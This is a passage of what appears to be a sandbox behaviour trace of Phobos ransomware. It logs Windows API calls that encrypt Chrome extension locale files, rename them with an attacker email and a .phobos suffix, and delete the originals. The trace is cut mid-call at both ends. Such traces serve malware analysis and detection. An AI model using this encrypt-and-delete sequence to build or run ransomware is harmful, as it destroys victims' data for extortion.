liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.254] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.254] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.254] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x104, lpOverlapped=0x0) returned 1 [0149.254] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0149.254] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0149.255] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.255] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.255] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.255] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.255] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.255] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.256] CloseHandle (hObject=0x190) returned 1 [0149.256] CloseHandle (hObject=0x148) returned 1 [0149.256] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json")) returned 1 [0149.257] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.257] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=208) returned 1 [0149.257] CloseHandle (hObject=0x148) returned 1 [0149.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0149.257] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.257] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.257] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.257] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.258] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.258] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd0, lpOverlapped=0x0) returned 1 [0149.258] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.258] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.259] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.259] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.259] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.259] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.259] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.259] CloseHandle (hObject=0x148) returned 1 [0149.259] CloseHandle (hObject=0x190) returned 1 [0149.260] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json")) returned 1 [0149.260] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.261] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=209) returned 1 [0149.261] CloseHandle (hObject=0x190) returned 1 [0149.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json")) returned 0x2020 [0149.261] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.261] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.261] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.262] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.262] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.262] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd1, lpOverlapped=0x0) returned 1 [0149.262] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0149.262] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0149.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.268] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.268] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.268] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.268] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.269] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.269] CloseHandle (hObject=0x190) returned 1 [0149.269] CloseHandle (hObject=0x148) returned 1 [0149.269] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json")) returned 1 [0149.271] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.271] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0149.271] CloseHandle (hObject=0x148) returned 1 [0149.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json")) returned 0x2020 [0149.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.271] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.272] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.272] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.272] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0149.273] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.273] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.274] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.274] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.274] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.274] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0149.274] CryptDestroyKey (hKey=0xa32da8) returned 1 [0149.274] CloseHandle (hObject=0x148) returned 1 [0149.274] CloseHandle (hObject=0x190) returned 1 [0149.274] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json")) returned 1 [0149.275] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0149.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.275] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=206) returned 1 [0149.275] CloseHandle (hObject=0x190) returned 1 [0149.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0149.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0149.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0149.276] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.276] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0149.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0149.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0149.276] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.276] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xce, lpOverlapped=0x0) returned 1 [0149.277] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0, dwBufLen=0xd0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xd0) returned 1 [0149.277] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xd0, lpOverlapped=0x0) returned 1 [0149.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32e28) returned 1 [0149.278] CryptSetKeyParam (hKey=0xa32e28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0149.278] CryptEncrypt (in: hKey=0xa32e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0149.278] CryptDestroyKey (hKey=0xa32e28) returned 1 [0149.278] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, 